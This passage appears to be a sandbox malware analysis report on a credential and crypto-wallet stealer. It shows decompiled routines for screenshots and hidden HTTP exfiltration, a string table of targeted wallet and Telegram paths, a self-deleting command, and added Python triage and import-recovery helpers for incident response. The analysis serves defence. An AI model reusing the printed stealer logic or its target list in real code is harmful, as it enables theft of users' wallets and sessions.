                            0x00418e9c
                            0x00418eae
                            0x00418ebf
                            0x00418eca
                            0x00418ecb
                            0x00418ecc
                            0x00000000
                            0x00418ecc
                            0x00418b86
                            0x00418b8b
                            0x00418b93
                            0x00418b9e
                            0x00418b9f
                            0x00418ba4
                            0x00418baf
                            0x00000000
                            0x00000000
                            0x00418bb5
                            0x00418de0
                            0x00418bc1
                            0x00418bd0
                            0x00418be1
                            0x00418bec
                            0x00418bef
                            0x00418bf4
                            0x00418bf6
                            0x00418c02
                            0x00418c0b
                            0x00418c16
                            0x00418c17
                            0x00418c1c
                            0x00418c2f
                            0x00418c40
                            0x00418c4b
                            0x00418c55
                            0x00418c60
                            0x00418c61
                            0x00418c62
                            0x00418c70
                            0x00418c78
                            0x00418c80
                            0x00418c83
                            0x00418c88
                            0x00418c93
                            0x00418ca8
                            0x00418cba
                            0x00418cca
                            0x00418cd8
                            0x00418ce6
                            0x00418cf7
                            0x00418d05
                            0x00418d16
                            0x00418d21
                            0x00418d2e
                            0x00418d3e
                            0x00418d52
                            0x00418d5e
                            0x00418d63
                            0x00418d63
                            0x00418d66
                            0x00418d67
                            0x00418d77
                            0x00418d88
                            0x00418d93
                            0x00418da0
                            0x00418dab
                            0x00418dba
                            0x00418dcb
                            0x00418dd6
                            0x00418dd7
                            0x00418dd8
                            0x00418dd8
                            0x00418ddd
                            0x00418ddd
                            0x00418ddd
                            0x00000000
                            0x004188ff
                            0x00418902
                            0x00418905
                            0x00418909
                            0x0041890b
                            0x00418916
                            0x00418921
                            0x00418926
                            0x00418926
                            0x00418935
                            0x00418937
                            0x00418942
                            0x0041894d
                            0x00418953
                            0x00418955
                            0x00418955
                            0x00418964
                            0x00418966
                            0x00418966
                            0x00418975
                            0x00418980
                            0x004189a1
                            0x004189a6
                            0x004189ac
                            0x004189ca
                            0x004189cf
                            0x004189d5
                            0x004189f3
                            0x004189f8
                            0x004189fe
                            0x00418a23
                            0x00418a25
                            0x00418a2a
                            0x00418a2a
                            0x00418a4f
                            0x00418a51
                            0x00418a56
                            0x00418a56
                            0x00418a65
                            0x00418a6a
                            0x00418a7b
                            0x00418a7d
                            0x00418a82
                            0x00418a82
                            0x00418a84
                            0x00418a89
                            0x00418a8c
                            0x00418a93
                            0x00418a93
                            0x00418a8c
                            0x00418aa2
                            0x00418aa9
                            0x00418aa9
                            0x00418ab8
                            0x00418ac7
                            0x00418acc
                            0x00418ad6
                            0x00418ad6
                            0x00418ae5
                            0x00418aec
                            0x00418aec
                            0x00418afb
                            0x00418afd
                            0x00418aff
                            0x00418b01
                            0x00418b09
                            0x00418b11
                            0x00418b14
                            0x00418b19
                            0x00418b1b
                            0x00418b1c
                            0x00418b21
                            0x00418b29
                            0x00418b29
                            0x00418b38
                            0x00418b3a
                            0x00418b3a
                            0x00000000
                            0x00418b38
                            0x00418fad
                            0x00418fad
                            0x00418fae
                            0x00418fae
                            0x00418fae
                            0x00000000
                            0x004188e3

                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00418751
                              • Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
                              • Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
                              • Part of subcall function 00409668: LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
                              • Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                              • Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                            • GetSystemMetrics.USER32 ref: 00418B0C
                            • GetSystemMetrics.USER32 ref: 00418B14
                            • ExitProcess.KERNEL32(00000000), ref: 00419657
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Create$AddressDirectoryMetricsProcSystem$ExitLibraryLoadMutexProcess
                            • String ID: "countryCode":"$"query":"$%APPDATA%\Ethereum\keystore\$%APPDATA%\Exodus\$%APPDATA%\Jaxx\Local Storage\$%APPDATA%\MultiBitHD\$%DSK_$%appdata%\Electrum-LTC\wallets\$%appdata%\Electrum\wallets\$%appdata%\Telegram Desktop\tdata\$%comspec%$*.json,*.seco$++++$/c %WINDIR%\system32\timeout.exe 3 & del "$<$</c>$</coks$</d>$</file$</info$</ip$</n>$</pwds$<c>$<coks$<d>$<file$<info$<ip$<n>$<pwds$Coins$Coins\Electrum$Coins\Electrum-LTC$Coins\Ethereum$Coins\Exodus$Coins\Jaxx\Local Storage\$Coins\MultiBitHD$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$T_@$Telegram$UTC*$exit$http://ip-api.com/json$image/jpeg$ip.txt$mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml$scr.jpg
                            • API String ID: 2865495769-3281574059
                            • Opcode ID: 77f75a62fe1b84184f4f5c61f86cd6f58c01be65bc5fe33c88b26c41f659bb80
                            • Instruction ID: 12fbeab09d86b4d4d3426c2dede24d6d64c59345960e79b613594a42cd3754e1
                            • Opcode Fuzzy Hash: 77f75a62fe1b84184f4f5c61f86cd6f58c01be65bc5fe33c88b26c41f659bb80
                            • Instruction Fuzzy Hash: 91A21A34A002199BDB10EB55DC91BDEB7B5EF49304F5080BBF408BB291DB78AE858F59
                            Uniqueness

                            Uniqueness Score: -1.00%
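
The string table above is, in effect, the sample's collection list (wallet and Telegram paths with their file masks), its self-deletion stub (%comspec% /c %WINDIR%\system32\timeout.exe 3 & del "...") and its geolocation beacon (http://ip-api.com/json). The Python below is an added triage example written for this page; it is not code from the sample, from Joe Sandbox or from any vendor. It assumes the pairing of masks to directories that the order of the string table suggests (Ethereum keystore with UTC*, Exodus with *.json and *.seco, MultiBitHD with the mbhd.* names, Telegram tdata with D877F783D5* and map*), that paths without a listed mask are collected whole, and that sub-directories are walked; the sample command lines and proxy lines are constructed, not taken from the sandbox run. The User-Agent string comes from the WinINet routine E00417D84 further down in this report.

```python
"""Added IR-triage helpers built from the strings of the routine above.

Example code written for this report; not code from the sample, from
Joe Sandbox, or from any vendor. Assumptions (not decompiled facts):
which file mask belongs to which directory, recursion into
sub-directories, and that paths with no listed mask are taken whole.
"""
import fnmatch
import os
import re

# %APPDATA%-relative directories the sample enumerates, paired with the
# masks that appear beside them in the string table. "*" = no mask listed.
TARGETED = {
    "Electrum\\wallets": ["*"],
    "Electrum-LTC\\wallets": ["*"],
    "Ethereum\\keystore": ["UTC*"],
    "Exodus": ["*.json", "*.seco"],
    "Jaxx\\Local Storage": ["*"],
    "MultiBitHD": ["mbhd.wallet.aes", "mbhd.checkpoints", "mbhd.spvchain", "mbhd.yaml"],
    "Telegram Desktop\\tdata": ["D877F783D5*", "map*"],
}

# '%comspec% /c %WINDIR%\system32\timeout.exe 3 & del "<path>"' as it shows
# up in a process-creation event; %WINDIR% may or may not have been expanded.
SELF_DELETE_RE = re.compile(
    r'(?i)/c\s+\S*timeout(?:\.exe)?\s+3\s*&\s*del\s+"([^"]+)"')

# Geolocation beacon from the string table and the hard-coded browser
# User-Agent used by the sample's WinINet routine (E00417D84).
GEOIP_URL = "http://ip-api.com/json"
AZORULT_UA = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"


def find_targeted_files(appdata):
    """Return sorted (subdir, relative_path) pairs under `appdata` matching the
    sample's collection list. Point it at a mounted image's AppData\\Roaming
    to scope what an infection would have exfiltrated."""
    hits = []
    for subdir, masks in TARGETED.items():
        root = os.path.join(appdata, *subdir.split("\\"))
        if not os.path.isdir(root):
            continue
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                if any(fnmatch.fnmatchcase(name, m) for m in masks):
                    rel = os.path.relpath(os.path.join(dirpath, name), root)
                    hits.append((subdir, rel))
    return sorted(hits)


def flag_self_delete(cmdlines):
    """Return (cmdline, deleted_path) for command lines that match the
    timeout-then-del stub; the deleted path is the stealer's own binary."""
    found = []
    for cmd in cmdlines:
        m = SELF_DELETE_RE.search(cmd)
        if m:
            found.append((cmd, m.group(1)))
    return found


def flag_geoip_beacon(proxy_lines):
    """Return proxy log lines fetching ip-api.com/json with the sample's UA.
    The old-IE UA alone is noisy; paired with the geolocation lookup it is
    a usable signal for this family."""
    return [line for line in proxy_lines if GEOIP_URL in line and AZORULT_UA in line]


# Constructed sample events (not captured from the sandbox run).
SAMPLE_CMDLINES = [
    'C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del '
    '"C:\\Users\\user\\Desktop\\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe"',
    'C:\\Windows\\system32\\cmd.exe /c timeout 3 & echo done',
    'C:\\Windows\\system32\\cmd.exe /c dir',
]
SAMPLE_PROXY = [
    '10.0.0.5 - - "GET http://ip-api.com/json HTTP/1.1" 200 ua="' + AZORULT_UA + '"',
    '10.0.0.5 - - "GET http://example.com/ HTTP/1.1" 200 ua="' + AZORULT_UA + '"',
]

if __name__ == "__main__":
    appdata = os.environ.get("APPDATA", os.path.expanduser("~"))
    for subdir, rel in find_targeted_files(appdata):
        print("would be collected:", subdir, rel)
    for cmd, path in flag_self_delete(SAMPLE_CMDLINES):
        print("self-delete of:", path)
    for line in flag_geoip_beacon(SAMPLE_PROXY):
        print("geoip beacon:", line)
```

Run it against the Roaming directory of the affected profile (or a mounted image) to list exactly which wallet, keystore and Telegram session files were in scope; the self-delete match gives the original path of the dropped binary, which is otherwise gone after the timeout.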

                            C-Code - Quality: 100%
                            			E00417216() {
                            				void* _t1;
                            				struct HINSTANCE__* _t2;
                            				struct HINSTANCE__* _t4;
                            				_Unknown_base(*)()* _t21;
                            
                             				 *0x41cb2c =  *0x41cb2c - 1; // init guard: imports are resolved while this counter is negative
                             				if( *0x41cb2c < 0) {
                             					// The resolved pointers are stored in the globals 0x41cb04..0x41cb28 and form a
                             					// screenshot-to-JPEG pipeline: HBITMAP -> GDI+ bitmap -> encoder lookup ->
                             					// GdipSaveImageToStream on an HGLOBAL-backed IStream. This matches the scr.jpg
                             					// and image/jpeg strings of the main routine above. Repeated LoadLibraryA calls
                             					// on Gdiplus.dll only raise its reference count after the first load.
                             					_t2 = LoadLibraryA("crtdll.dll"); // executed
                            					 *0x41cb04 = GetProcAddress(_t2, "wcscmp");
                            					_t4 = LoadLibraryA("Gdiplus.dll"); // executed
                            					 *0x41cb08 = GetProcAddress(_t4, "GdiplusStartup");
                            					 *0x41cb0c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdiplusShutdown");
                            					 *0x41cb10 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipCreateBitmapFromHBITMAP");
                            					 *0x41cb14 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncodersSize");
                            					 *0x41cb18 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncoders");
                            					 *0x41cb1c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipDisposeImage");
                            					 *0x41cb20 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipSaveImageToStream");
                            					 *0x41cb24 = GetProcAddress(LoadLibraryA("ole32.dll"), "CreateStreamOnHGlobal");
                            					_t21 = GetProcAddress(LoadLibraryA("ole32.dll"), "GetHGlobalFromStream");
                            					 *0x41cb28 = _t21;
                            					return _t21;
                            				}
                            				return _t1;
                             			}

                             (Instruction address column for E00417216, 0x00417218 to 0x00417329; the matching disassembly text was not captured.)

                            APIs
                            • LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 0041722F
                            • GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417235
                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417249
                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041724F
                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417263
                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417269
                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 0041727D
                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417283
                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417297
                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041729D
                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 004172B1
                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172B7
                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 004172CB
                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172D1
                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 004172E5
                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172EB
                            • LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 004172FF
                            • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417305
                            • LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417319
                            • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 0041731F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
                            • API String ID: 2574300362-2815069134
                            • Opcode ID: 6066d74275340564eb798eb54cff0014ed99463c17dffbc14204bf95336a66af
                            • Instruction ID: 88d1ed536910c73cd15d425763909c73792c0e606fd49294d8ff60234fce0fcb
                            • Opcode Fuzzy Hash: 6066d74275340564eb798eb54cff0014ed99463c17dffbc14204bf95336a66af
                            • Instruction Fuzzy Hash: BD11EDF16D8304B5C60077F2FD47ADA26657645709361453BBE10B20E2D57C6881A69D
                            Uniqueness

                            Uniqueness Score: -1.00%
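
The routine E00417D84 that follows resolves its WinINet imports by calling GetProcAddress with a pointer to the "wininet.dll" literal plus a fixed offset (+0xc, +0x1a, +0x2b, ...), so the export names never show up as referenced strings. The Python below is an added example for this page, not code from the sample or from Joe Sandbox, showing how far the offsets alone carry an analyst: it assumes the names are stored as contiguous NUL-terminated C strings directly after "wininet.dll" (so each gap is one name plus its NUL), takes as candidates the WinINet APIs the decompiled body is seen to call, and adds InternetCloseHandle as an assumed candidate for the one slot no visible call explains. The two usage constraints come from the body itself: _v32 is called with an HTTP_ADDREQ_FLAG_* value and _v48 with INTERNET_OPTION_* codes.

```python
"""Added example: recovering the WinINet export names that E00417D84
resolves through fixed offsets into its "wininet.dll" string constant.

Example code written for this report, not code from the sample.
Assumption: names are contiguous NUL-terminated C strings right after
"wininet.dll". InternetCloseHandle is an assumed candidate.
"""

BASE = "wininet.dll"
# GetProcAddress offsets in the order they are read (_v20, _v24, ..., _v48).
SLOTS = [0x0C, 0x1A, 0x2B, 0x3C, 0x53, 0x64, 0x75, 0x89, 0x9B]
CANDIDATES = [
    "InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
    "HttpAddRequestHeadersA", "HttpSendRequestA", "InternetReadFile",
    "InternetCloseHandle", "InternetCrackUrlA", "InternetSetOptionA",
]
# Constraints visible in the decompiled body: slot 3 (_v32) is called with an
# HTTP_ADDREQ_FLAG_* value, slot 8 (_v48) with INTERNET_OPTION_* codes.
USAGE = {3: "HttpAddRequestHeadersA", 8: "InternetSetOptionA"}


def slot_lengths(slots, base=BASE):
    """Name length implied by each slot: gap to the next slot minus the NUL.
    The last slot has no successor, so its length is None (unknown)."""
    if slots[0] != len(base) + 1:
        raise ValueError("first slot does not start right after the DLL name")
    lengths = []
    for i, off in enumerate(slots):
        if i + 1 < len(slots):
            lengths.append(slots[i + 1] - off - 1)
        else:
            lengths.append(None)
    return lengths


def solve(slots=SLOTS, candidates=CANDIDATES, usage=USAGE):
    """For each slot, the candidate names consistent with its length and the
    usage constraints. A one-element list is a resolved slot; a longer list
    reports the remaining ambiguity instead of guessing."""
    lengths = slot_lengths(slots)
    result = []
    for i, length in enumerate(lengths):
        if i in usage:
            result.append([usage[i]])
        elif length is None:
            result.append(list(candidates))
        else:
            result.append([c for c in candidates if len(c) == length])
    # Constraint propagation: a name fixed to one slot cannot fill another.
    changed = True
    while changed:
        changed = False
        fixed = {r[0] for r in result if len(r) == 1}
        for r in result:
            if len(r) > 1:
                kept = [c for c in r if c not in fixed]
                if kept != r:
                    r[:] = kept
                    changed = True
    return result


if __name__ == "__main__":
    for off, names in zip(SLOTS, solve()):
        print(f"+0x{off:02x}: {' | '.join(names)}")
```

Five of the nine slots fall out of the gaps alone (13, 22, 19 and 17 characters are unique among the candidates, and the last slot is fixed by its usage). The four 16-character slots cannot be separated by length: InternetConnectA, HttpOpenRequestA, HttpSendRequestA and InternetReadFile all fit. The decompiler's own labels on the direct calls appear in the body in exactly that order, which is consistent with slots 1, 2, 4 and 5, but that is the sandbox decompiler's dynamic resolution, not something the offsets can prove.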

                            C-Code - Quality: 74%
                            			E00417D84(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
                            				char _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				_Unknown_base(*)()* _v20;
                            				_Unknown_base(*)()* _v24;
                            				_Unknown_base(*)()* _v28;
                            				_Unknown_base(*)()* _v32;
                            				_Unknown_base(*)()* _v36;
                            				_Unknown_base(*)()* _v40;
                            				_Unknown_base(*)()* _v44;
                            				_Unknown_base(*)()* _v48;
                            				char _v52;
                            				char _v56;
                            				long _v60;
                            				void* _v64;
                            				void* _v68;
                            				int _v72;
                            				char _v73;
                            				signed int _v80;
                            				char _v84;
                            				char _v88;
                            				char _v92;
                            				char _v96;
                            				char _v100;
                            				char _v132;
                            				char _v388;
                            				char _v516;
                            				char _v644;
                            				char _v2692;
                            				char _v3716;
                            				char _v3776;
                            				void _v69412;
                            				char _v69416;
                            				char _v69420;
                            				char _v69424;
                            				char _v69428;
                            				char _v69432;
                            				char _v69436;
                            				char _v69440;
                            				void* __ecx;
                            				long _t224;
                            				long _t293;
                            				void* _t307;
                            				struct HINSTANCE__* _t325;
                            				struct HINSTANCE__* _t329;
                            				void* _t330;
                            				intOrPtr _t332;
                            				intOrPtr _t356;
                            				void* _t365;
                            				struct _SYSTEMTIME _t376;
                            				intOrPtr* _t378;
                            				intOrPtr _t380;
                            				intOrPtr _t381;
                            				char _t396;
                            
                            				_t380 = _t381;
                            				_t332 = 0x21e7;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t332 = _t332 - 1;
                            				} while (_t332 != 0);
                            				_t1 =  &_v8;
                            				 *_t1 = _t332;
                            				_v16 =  *_t1;
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00403980(_v8);
                            				E00403980(_v12);
                            				E00403980(_v16);
                            				_t376 =  &_v3776;
                            				_push(_t380);
                            				_push(0x418292);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t381;
                            				if(_v16 == 0) {
                            					E0040357C( &_v16, 0x4182ac);
                            				}
                            				E004034E4( &_v92);
                            				E0040357C( &_v56, _v8);
                            				_v73 = 0;
                             				E0040357C( &_v52, "wininet.dll");
                             				_t329 = GetModuleHandleA(E004039E8( &_v52)); // reuse wininet if already mapped, else load it
                             				if(_t329 == 0) {
                             					_t325 = LoadLibraryA(E004039E8( &_v52)); // executed
                             					_t329 = _t325;
                             				}
                             				// Export names are read at fixed offsets past the "wininet.dll" literal (+0xc, +0x1a, ...),
                             				// so they never appear as referenced strings. Of the nine slots, _v32 is later called with
                             				// HTTP_ADDREQ_FLAG_* values and _v48 with INTERNET_OPTION_* codes.
                             				_v20 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0xc]));
                             				_v24 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x1a]));
                             				_v28 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x2b]));
                             				_v32 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x3c]));
                             				_v36 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x53]));
                             				_v40 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x64]));
                             				_t378 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x75]));
                             				_v44 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x89]));
                             				_v48 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x9b]));
                            				E00404F5C();
                            				E00404F5C();
                            				E00404F5C();
                            				E00404F5C();
                            				E00404F5C();
                            				E00404F5C();
                            				E00404F5C();
                             				// _t376 is a URL_COMPONENTSA (dwStructSize 0x3c = 60 bytes) with caller-supplied buffers.
                             				 *_t376 = 0x3c;
                             				 *((intOrPtr*)(_t376 + 4)) =  &_v132; // lpszScheme
                             				 *((intOrPtr*)(_t376 + 8)) = 0x20; // dwSchemeLength
                             				 *(_t376 + 0x10) =  &_v388; // lpszHostName
                             				 *((intOrPtr*)(_t376 + 0x14)) = 0x100; // dwHostNameLength
                             				 *((intOrPtr*)(_t376 + 0x1c)) =  &_v516; // lpszUserName
                             				 *((intOrPtr*)(_t376 + 0x20)) = 0x80; // dwUserNameLength
                             				 *((intOrPtr*)(_t376 + 0x24)) =  &_v644; // lpszPassword
                             				 *((intOrPtr*)(_t376 + 0x28)) = 0x80; // dwPasswordLength
                             				 *(_t376 + 0x2c) =  &_v2692; // lpszUrlPath
                             				 *((intOrPtr*)(_t376 + 0x30)) = 0x800; // dwUrlPathLength
                             				 *((intOrPtr*)(_t376 + 0x34)) =  &_v3716; // lpszExtraInfo
                             				 *((intOrPtr*)(_t376 + 0x38)) = 0x400; // dwExtraInfoLength
                             				_t224 = E00403790(_v56); // length of the URL in _v56
                             				InternetCrackUrlA(E00403990(_v56), _t224, 0x90000000, _t376); // ICU_DECODE | ICU_ESCAPE
                             				// Copy lpszHostName, take the substring starting at character 4 and compare it with the
                             				// constant at 0x418374 (not shown in this excerpt). When the branch is taken (_v73 = 1) the
                             				// original host is kept in an explicit "Host: " header, added below with HttpAddRequestHeaders,
                             				// and E00417668 substitutes the host name that InternetConnectA actually connects to.
                             				E004036DC( &_v100,  *(_t376 + 0x10));
                             				E004039F0(_v100, 4, E00403790(_v100) - 3,  &_v69416);
                             				if(E00403AD4(0x418374, _v69416) != 0) {
                             					_v73 = 1;
                             					E004036DC( &_v69420,  *(_t376 + 0x10));
                             					E004037DC( &_v88, _v69420, "Host: ");
                             					E00417668(_v100, _t329,  &_v69424, _t376, _t378);
                             					 *(_t376 + 0x10) = E00403990(_v69424);
                             				}
                            				_t330 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", 0, 0, 0, 0);
                            				if(_t330 != 0) {
                            					_v84 = 0x2dc6c0;
                            					_v48(_t330, 6,  &_v84, 4);
                            					_v48(_t330, 5,  &_v84, 4);
                            					_v64 = InternetConnectA(_t330,  *(_t376 + 0x10),  *(_t376 + 0x18), 0, 0, 3, 0, 0);
                            					if(_v64 != 0) {
                            						_v80 = 0x84003300;
                            						E004036DC( &_v69428,  *((intOrPtr*)(_t376 + 4)));
                            						if(E00403AD4(0x4183c8, _v69428) != 0) {
                            							_v80 = _v80 | 0x00800000;
                            						}
                            						_v68 = HttpOpenRequestA(_v64, E00403990(_v16),  *(_t376 + 0x2c), 0, 0, 0, _v80, 0);
                            						if(_v68 != 0) {
                            							if(_v73 != 0) {
                            								_v32(_v68, E00403990(_v88), E00403790(_v88), 0xa0000000);
                            							}
                            							_t293 = E00403790(_v12);
                            							if(HttpSendRequestA(_v68, 0x4183cc, 0, E00403990(_v12), _t293) != 0) {
                            								do {
                            									E00404F5C();
                            									_v72 = InternetReadFile(_v68,  &_v69412, 0x10064,  &_v60);
                            									E004035D4( &_v96, _v60,  &_v69412);
                            									_t307 = E00403798( &_v92, _v96);
                            									asm("sbb eax, eax");
                            								} while (_t307 + 1 != 0 && _v60 != 0);
                            							}
                            						}
                            						InternetCloseHandle(_v68); // executed
                            					}
                            					 *_t378(_v64);
                            				}
                            				 *_t378(_t330);
                            				_t396 = _v92;
                            				if(_t396 == 0) {
                            					_push(_v100);
                            					_push(_v12);
                            					_push( *(_t376 + 0x18));
                            					_push( &_v92);
                            					E004036DC( &_v69432,  *(_t376 + 0x2c));
                            					_push(_v69432);
                            					E004036DC( &_v69436,  *(_t376 + 0x10));
                            					_pop(_t365);
                            					E00417820(_v69436, _t330, _v16, _t365, _t378);
                            				}
                            				E004038DC(_v16, 0x4182ac);
                            				if(_t396 == 0) {
                            					E0040627C(_v100, _t330,  &_v69440, _t378, _t396);
                            					E004038DC(_v69440, "4188DA24");
                            					if(_t396 != 0) {
                            						E004034E4( &_v92);
                            					}
                            				}
                            				E00403538(_a4, _v92);
                            				E004034E4( &_v92);
                            				_pop(_t356);
                            				 *[fs:eax] = _t356;
                            				_push(E00418299);
                            				E00403508( &_v69440, 7);
                            				E00403508( &_v100, 4);
                            				E00403508( &_v56, 2);
                            				return E00403508( &_v16, 3);
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E0F
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E23
                            • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 00417E37
                            • GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00417E4C
                            • GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00417E61
                            • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00417E76
                            • GetProcAddress.KERNEL32(00000000,-00000053), ref: 00417E8B
                            • GetProcAddress.KERNEL32(00000000,-00000064), ref: 00417EA0
                            • GetProcAddress.KERNEL32(00000000,-00000075), ref: 00417EB5
                            • GetProcAddress.KERNEL32(00000000,-00000089), ref: 00417ECB
                            • GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00417EE2
                            • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 00417FCE
                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041805F
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0041809F
                            • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,?,?,00000000,00000000,00000000), ref: 004180FC
                            • HttpSendRequestA.WININET(00000000,004183CC,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041814D
                            • InternetReadFile.WININET(00000000,?,00010064,?,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00418178
                            • InternetCloseHandle.WININET(00000000,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 004181AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Internet$HandleHttpOpenRequest$CloseConnectCrackFileLibraryLoadModuleReadSend
